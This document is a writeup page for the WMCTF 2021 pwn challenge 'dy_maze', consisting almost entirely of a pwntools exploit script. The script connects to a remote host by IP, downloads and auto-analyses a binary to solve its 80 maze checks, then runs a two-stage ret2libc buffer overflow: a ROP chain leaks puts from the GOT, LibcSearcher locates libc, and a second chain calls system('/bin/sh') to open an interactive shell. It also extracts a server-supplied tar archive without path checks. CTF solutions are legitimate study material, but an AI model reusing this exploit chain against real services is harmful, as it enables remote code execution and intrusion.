
关于python:WMCTF-2021-pwn-dymaze-writeup


from pwn import *
from LibcSearcher import *
from binascii import a2b_base64
import os
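# pwntools runtime settings: verbose I/O logging, x86-64 Linux target, and the
# terminal used by gdb.attach() when debugging locally.
# (The pasted page had typographic quotes here, which are a SyntaxError.)
context(log_level='debug', os='linux', arch='amd64', bits=64)
context.terminal = ['/usr/bin/x-terminal-emulator', '-e']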

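# Interface
# Switch between a local debugging run (process + gdb) and the remote service.
local = False

binary_name = "dy_maze"

# The second assignment wins: the UUID-looking name is presumably the file the
# challenge actually ships; the "dy_maze" value above is dead and kept for history.
binary_name = "38a5a00c-08ac-11ec-b124-0242ac110003"
port = 44212
if local:
    p = process(["./" + binary_name])
    e = ELF("./" + binary_name)
    # libc = e.libc
else:
    # Remote endpoint as given in the writeup; `e` is created later from the
    # binary the service streams down, not here.
    p = remote("47.104.169.32", port)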

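def z(a=''):
    """Attach gdb to the local process; a no-op when running against the remote.

    Args:
        a: gdb command string handed to ``gdb.attach`` (typically a breakpoint
           such as ``'b ok_success'``). When empty, execution pauses on
           ``input()`` so breakpoints can be set by hand before continuing.

    Returns:
        None.
    """
    if not local:
        return
    gdb.attach(p, a)
    if a == '':
        # Was raw_input(): a Python 2 name that raises NameError on Python 3,
        # which the rest of this script (bytes literals, int.to_bytes) requires.
        input()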

def ru(x):
    """Receive from ``p`` until *x* is seen (``p.recvuntil``)."""
    return p.recvuntil(x)


def rc(x):
    """Receive up to *x* bytes from ``p`` (``p.recv``)."""
    return p.recv(x)


def sl(x):
    """Send *x* followed by a newline (``p.sendline``)."""
    return p.sendline(x)


def sd(x):
    """Send *x* unchanged (``p.send``)."""
    return p.send(x)


def sla(delim, data):
    """Wait for *delim*, then send *data* plus newline (``p.sendlineafter``)."""
    return p.sendlineafter(delim, data)
def encode(payload, offset):
    """XOR *payload* with the 5-byte key held in ``success_temp``.

    Byte ``i`` of the result is ``payload[i] ^ success_temp[(i + offset) % 5]``,
    so *offset* selects which key byte lines up with the first payload byte.
    ``success_temp`` is filled in by the ELF analysis in the main block before
    this is called.

    Args:
        payload: bytes to transform.
        offset: starting index into the key (taken modulo 5).

    Returns:
        The transformed bytes, same length as *payload*.
    """
    key_len = 5
    return bytes(
        byte ^ success_temp[(pos + offset) % key_len]
        for pos, byte in enumerate(payload)
    )

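# Others
# Five-byte XOR key used by encode(). It starts empty and is appended to by the
# ELF analysis in the main block, one byte per match of a fixed instruction
# pattern in the downloaded binary. (The bare word "Others" in the pasted page
# was a comment whose '#' the site stripped; as code it is a NameError.)
success_temp = []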

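# Main
# Entry point for the WMCTF 2021 "dy_maze" solve. Restored from a paste that had
# lost its indentation, the underscores of __name__, and carried injected site
# text inside one statement; the flow itself is unchanged.
if __name__ == "__main__":
    # z('b maze_25')
    z('b ok_success\n')

    # initialize
    p.recvuntil(b'Solution?')
    confirm = input()  # the answer to the service's prompt is typed in by the operator
    sl(confirm)

    # Create binary file
    # The service streams the challenge binary as base64 inside a bz2 tarball.
    ru(b'Binary Download Start')
    ru(b'\n')
    b64_data = p.recvuntil(b'\n==', drop=True)
    with open('temp.bz2', 'wb') as f:
        f.write(a2b_base64(b64_data))

    ru(b'\n')
    # NOTE(review): this extracts an archive supplied by the remote peer with no
    # member-path check, so a hostile server could place files outside the
    # working directory; run from a scratch directory or list the archive first.
    # The verbose listing is assumed to name exactly one member, which is taken
    # as the binary's filename.
    temp_binary = os.popen('tar -xjvf temp.bz2').read().strip('\n')
    e = ELF("./" + temp_binary)

    # Start ELF Analysis
    # maze_1 .. maze_80 are the room functions; sort them by address so the n-th
    # pattern hit below can be mapped back to its room number.
    d = {i: e.symbols['maze_{}'.format(i)] for i in range(1, 81)}
    maze_address = sorted(d.items(), key=lambda x: x[1])
    key = {}
    # 83 c0 01 encodes `add eax, 1`. From each hit walk backwards to the nearest
    # 83 7d fc (`cmp dword [rbp-4], imm8`) and record its imm8 as that room's
    # expected answer. Assumes the 80 hits occur in the same order as the
    # sorted room addresses.
    for ind, addr in zip(range(80), e.search(b'\x83\xc0\x01')):
        addr -= 4
        while e.data[e.vaddr_to_offset(addr): e.vaddr_to_offset(addr) + 3] != b'\x83\x7d\xfc':
            addr -= 1
        key[maze_address[ind][0]] = e.data[e.vaddr_to_offset(addr) + 3]
    # 48 98 88 54 05 ec encodes `cdqe; mov [rbp+rax-0x14], dl`; the byte just
    # before each hit is collected as one byte of the XOR key used by encode().
    for addr in e.search(b'\x48\x98\x88\x54\x05\xEC'):
        success_temp.append(e.data[e.vaddr_to_offset(addr) - 1])
    prdi = next(e.search(b'\x5f\xc3'))  # 5f c3 = `pop rdi; ret`
    # End Analysis
    # key[80] = 32
    # Answer all 80 rooms as space-separated decimals, then the value for ok_success.
    payload = b''.join(str(key[i]).encode('utf-8') + b' ' for i in range(1, 81))
    # ok_success
    payload += str(100).encode('utf-8')
    sl(payload)
    sleep(2)
    # p.recvall()
    ru(b'Good')
    # sl(b'100')
    sleep(2)
    # input your name:
    # Stage 1: 0x14 bytes of buffer plus 8 bytes (presumably the saved rbp),
    # then a chain that calls puts@plt on puts' GOT entry to leak its address
    # and returns into ok_success for a second input. The input goes through
    # encode() because the binary apparently applies the same 5-byte XOR to it.
    payload = b'a' * 0x14 + b'b' * 8 + p64(prdi) + p64(e.got['puts']) + p64(e.plt['puts']) + p64(e.symbols['ok_success'])
    sl(encode(payload, 0))
    # sl(payload)
    sleep(2)
    ru(b'name: ')
    puts_addr = p.recvuntil(b'\n', drop=True).ljust(8, b'\x00')
    puts_addr = u64(puts_addr)
    log.success("puts addr found: " + hex(puts_addr))
    # LibcSearcher matches the leaked address against known libc builds; if it
    # reports several candidates, choose one explicitly (see the commented call).
    libc = LibcSearcher('puts', puts_addr)
    # libc.select_libc(9)
    libc_base = puts_addr - libc.dump('puts')
    log.success('libc base found: ' + hex(libc_base))
    p.sendlineafter(b'length', str(100).encode('utf-8'))
    # Attacking:
    # Stage 2: system("/bin/sh") from the located libc; prdi + 1 is the lone
    # `ret`, presumably inserted to keep the stack 16-byte aligned for system.
    payload = b'a' * 0x14 + b'b' * 8 + p64(prdi) + p64(libc.dump('str_bin_sh') + libc_base)
    payload += p64(prdi + 1) + p64(libc.dump('system') + libc_base)
    sla(b'name: ', encode(payload, 1))
    p.interactive()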
